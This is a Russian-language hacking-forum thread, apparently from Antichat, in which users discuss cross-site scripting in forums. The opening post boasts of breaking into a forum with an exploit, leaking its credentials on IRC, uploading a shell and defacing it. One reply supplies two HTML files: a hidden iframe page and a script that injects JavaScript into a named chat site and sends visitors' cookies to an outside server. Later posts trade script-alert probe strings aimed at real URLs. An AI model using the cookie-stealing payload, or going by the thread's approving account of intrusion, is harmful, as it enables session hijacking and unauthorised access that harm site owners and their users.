ANTICHAT - XSS в форуме. Вопросы..

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - XSS в форуме. Вопросы.. (https://forum.antichat.xyz/showthread.php?t=8656)

Прикол недавно обнаружили, короче, а история такая:
Сидел я сидел, и чет мне один форум захотелось зафлеймить, взял афторский сплойт, нашел в общем все что нужно, конечно засрал форум, а потом а ирке в общяк бросил пароль с логином, вы бы видели че с форумом делали...и шел залили, и дефейснули(правда потом обратно вернули), но самое главное, у этого domena.victim.ru был доступ www))) короче у нас свой сервант с высокоскоростным каналом, скоро бота на ирк поставим))

Цитата:

но самое главное, у этого domena.victim.ru был доступ www

Сам то понял, что сказал?

страница своя типа такой должна быть?
Файл 1.html

<IFRAME SRC="2.html" height=0 width=0 frameborder=0 vspace=0 hspace=0></iframe>
<center>
<img src=http://www.xoxma.ru/img/baba.jpg>
</center>

Файл 2.html
<html>
<body>
<script>
navigate("http://chat.gala.net/?index.php?=\" style=\"background:url('javascript:i=new Image()\\;i.src=\\'http://antichat.ru/cgi-bin/s.jpg?\\'%2Bdocument.cookie');");
</script>
</body>
</html>

Цитата:

Прошу объяснить мне такую вещь.
Есть форум, и там можно в url прописать
http://forum/last.php?do=<script>alert()</script>
и выскакивает alert. Прбовал ../../../etc/passwd

ЁЁёёё )) Извините что не читал пред. посты, возможно уже все обьяснили...
Чувак, ты пишешь alert(). У тебя браузер (БРАУЗЕР) выполняет этот код.
Откуда у тебя ТВОЙ БРАУЗЕР возьмет /etc/passwd ? Это вообще как понимать)) Ну бывают же вопросы)) /etc/passwd храниться на СЕРВЕРЕ.
Да и что ты получишь выводом /etc/passwd, даже если бы alert() могла читать файлы, и у тебя на диске хранился етс/пассвд (смешно конечно))) ? Много (или не очень) записей юзеров с логином, интерпретатором и т д НО БЕЗ ПАРОЛЯ.

я этим проверял на php инъекцию, думал мож прокатит

Это все фигня =))) мой первый вопрос на форуме хакзоны было: "Как проникнуть на винты ФСБ" =)))

ыыыы )))))))) а мой...зашел на сайт а там индекса не было и содержимое папки было видно, вот и спросил, можно ли с этим поделать что нибудь)))))

киборг, советую почитать статьи по Xss и понять что это за баг.

>>киборг, советую почитать статьи по Xss и понять что это за баг.

ды хрен поймешь, чо там написано. Какие то скули, инклуды, этот баг вроде к ним относиться, да?

Вроде как если xss, то файл можно прочесть явой скрипт, например так
http://forum/last.php?do=<script>alert('/etc/passwd')</script>
но почему то он не показываеться, помоги а?

Код:

<form name=chatlogin action=/?index.php?"><script>alert()</script> method=post>

Вот результат твоего когда.

Мне лично кажется, что ты просто обращаешься к самой странице. Это типа если бы ты сделал

Код:

http://chat.gala.net/?index.php?p="><script>alert()</script>

На античате была такая же уязвимость которую нашел Fr1k кажется на главной странице.

Тут твой код выполняется не на самом сервере, а на странице к которой ты обратился. Мне так кажется.

Код HTML:

http://chat.gala.net/?"><script>alert()</script>

После знака вопроса просто идет индекс файлов. Лист их, а фильтрация отсутствует вот и все.
index.php это файл в который пошлется твоя вводимая информация, которая будет этим файлом обработана.

Хотя тут можно только гадать не посмотревши исходники.

Код:

<form name=chatlogin action=/?index%00.php?p="><script>alert()</script> method=post>

Но так алерта не должно быть и не будет и нет +)))))))

Спроси у Алгола короче да нам расскажи что он скажет.